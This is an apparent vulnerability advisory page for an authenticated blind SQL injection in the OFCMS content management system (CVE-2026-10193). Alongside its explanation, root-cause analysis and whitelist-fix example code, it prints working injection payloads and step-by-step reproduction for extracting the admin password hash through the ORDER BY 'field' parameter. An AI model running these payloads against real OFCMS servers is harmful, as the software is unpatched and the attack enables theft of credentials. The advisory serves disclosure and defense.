VYPR
Medium severity (6.3) · NVD Advisory · Published May 31, 2026

CVE-2026-10193

Description

OFCMS up to 1.1.3 contains an SQL injection in the ComnController query function via the field parameter, allowing remote blind exploitation.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The open-source content management system OFCMS, up to version 1.1.3, contains an SQL injection vulnerability in the ComnController component. The flaw resides in the Java file ofcms-admin/src/main/java/com/ofsoft/cms/admin/controller/ComnController.java within the query() method. When the sqlid parameter equals system.user.query, the backend SQL query is built by concatenating the user-supplied field and sort parameters directly into the ORDER BY clause, with no sanitization or whitelist check [1]. An authenticated attacker with backend access can therefore inject arbitrary SQL expressions at that position.

Exploitation

An attacker must first authenticate to the OFCMS backend. With valid credentials, they can send HTTP requests to the vulnerable query endpoint, controlling the field and sort parameters. The official advisory [1] demonstrates exploitation by crafting a complex expression in the field parameter that includes nested subqueries with Boolean logic, enabling blind extraction of database contents. The exploit requires knowledge of the backend SQL structure but no special network position beyond network access to the application.

Impact

Successful exploitation allows an authenticated attacker to extract arbitrary data from the database, including sensitive information such as user passwords. The advisory [1] confirms reading a user's password hash. This constitutes a breach of confidentiality and could lead to further privilege escalation or account compromise.

Mitigation

As of publication, the OFCMS project has not responded to the issue report and no patched version has been released [1]. Users are advised to restrict network access to the backend, monitor for suspicious queries, and apply strict input validation on the field and sort parameters as a temporary workaround until an official fix is provided. The vulnerability is not currently listed on CISA's Known Exploited Vulnerabilities (KEV) catalog.

AI Insight generated on May 31, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The `field` parameter is directly concatenated into the `ORDER BY` clause of the SQL query without any sanitization or whitelist validation."

Attack vector

An authenticated attacker with backend access sends a POST request to `/ofcms_admin/admin/comn/service/query.json` with `sqlid=system.user.query` and a malicious `field` parameter. Because the `field` value is directly interpolated into the `ORDER BY` clause without sanitization, the attacker can inject SQL expressions such as `if(LeNgth((select/**/user_password/**/from/**/of_sys_user/**/where/**/user_id=1))=X,u.user_id,(select/**/1/**/union/**/select/**/2))`. The server's response (200 vs. 500) acts as an oracle, enabling blind extraction of arbitrary data. [ref_id=1]

Affected code

The vulnerability resides in `ComnController.java` (`ofcms-admin/src/main/java/com/ofsoft/cms/admin/controller/ComnController.java`), specifically in the `query()` method at lines 33-34. The `field` and `sort` parameters are passed unsanitized into `Db.getSqlPara()`, which loads the SQL template from `system/user.sql` and concatenates these values directly into the `ORDER BY` clause. [ref_id=1]

What the fix does

No official patch has been released by the project maintainer. The advisory recommends two mitigations: (1) filter or validate all user-supplied input before it reaches the SQL query, and (2) implement a whitelist of allowed sort/field values so that only predefined column names can be appended to the `ORDER BY` clause. Without such controls, the `field` parameter remains a direct injection vector. [ref_id=1]
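The whitelist the advisory recommends, shown next to the vulnerable concatenation it replaces. This is an added example written for this page, not OFCMS code (the project is Java); it uses an in-memory SQLite table with constructed rows, and only the table and column names `of_sys_user`, `user_id` and `user_password` are taken from the advisory. Because SQLite has no `IF()` and ignores extra rows from a scalar subquery, the probe here flips the sort direction rather than forcing a 500, which is enough to show that an unfiltered `field` parameter leaks a yes/no answer:

```python
"""Vulnerable ORDER BY construction beside a whitelisted version.
Example code added for this page; not from the OFCMS project."""
import sqlite3
from typing import List

ROWS = [  # constructed sample data, not real OFCMS records
    (1, "admin", "5f4dcc3b5aa765d67d3a6ba6e9ea4b04"),
    (2, "editor", "8d3c0f2a6f1b4e9c"),
    (3, "guest", "0000"),
]


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table of_sys_user(user_id integer, user_name text, user_password text)")
    con.executemany("insert into of_sys_user values (?, ?, ?)", ROWS)
    return con


def vulnerable_user_ids(field: str, sort: str) -> List[int]:
    # Same pattern as the flaw: request values concatenated straight into ORDER BY.
    sql = f"select u.user_id from of_sys_user u order by {field} {sort}"
    return [row[0] for row in _db().execute(sql)]


# Whitelist: each accepted request value maps to the only SQL fragment it may become.
ALLOWED_FIELDS = {"user_id": "u.user_id", "user_name": "u.user_name"}
ALLOWED_SORT = {"asc": "ASC", "desc": "DESC"}


def safe_order_by(field: str, sort: str) -> str:
    """Translate request values through the whitelist; anything else is rejected."""
    if field not in ALLOWED_FIELDS or sort.lower() not in ALLOWED_SORT:
        raise ValueError(f"rejected ORDER BY input: field={field!r} sort={sort!r}")
    return f"{ALLOWED_FIELDS[field]} {ALLOWED_SORT[sort.lower()]}"


def hardened_user_ids(field: str, sort: str) -> List[int]:
    sql = "select u.user_id from of_sys_user u order by " + safe_order_by(field, sort)
    return [row[0] for row in _db().execute(sql)]


def is_rejected(field: str, sort: str) -> bool:
    try:
        safe_order_by(field, sort)
        return False
    except ValueError:
        return True


# Boolean probe for the vulnerable builder: a true condition sorts ids ascending,
# a false one sorts by -user_id and so comes back descending.
PROBE = ("(case when length((select user_password from of_sys_user where user_id=1)) = {n} "
         "then u.user_id else -u.user_id end)")

if __name__ == "__main__":
    print(vulnerable_user_ids(PROBE.format(n=32), "asc"))  # [1, 2, 3]: length guess correct
    print(vulnerable_user_ids(PROBE.format(n=31), "asc"))  # [3, 2, 1]: guess wrong
    print(is_rejected(PROBE.format(n=32), "asc"))          # True
```

The point of the whitelist is that the request value never reaches the SQL text at all: it is only ever used as a dictionary key, so escaping or pattern-filtering the `field` string is unnecessary and is not what protects the query.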

Preconditions

  • Auth: the attacker must have valid backend credentials and a session cookie.
  • Network: the application must be reachable over the network.
  • Input: the `field` parameter is attacker-controlled and unsanitized.

Reproduction

1. Log in to the OFCMS backend and capture the session cookie.
2. Send a POST request to `/ofcms_admin/admin/comn/service/query.json` with `Content-Type: application/x-www-form-urlencoded`.
3. Set the body to `sqlid=system.user.query&pageNum=1&pageSize=10&field=if(LeNgth((select/**/user_password/**/from/**/of_sys_user/**/where/**/user_id=1))=X,u.user_id,(select/**/1/**/union/**/select/**/2))&sort=asc`, iterating `X` from 1 to 250.
4. A 200 response indicates the guessed length is correct; a 500 response indicates it is wrong.
5. For character extraction, use `field=if((select/**/ascii(substr(user_password,X,1))/**/from/**/of_sys_user/**/where/**/user_id=1)=Y,u.user_id,(select/**/1/**/union/**/select/**/2))` and iterate `X` (position) and `Y` (ASCII value). [ref_id=1]

Generated on May 31, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 5

News mentions: 0

No linked articles in our index yet.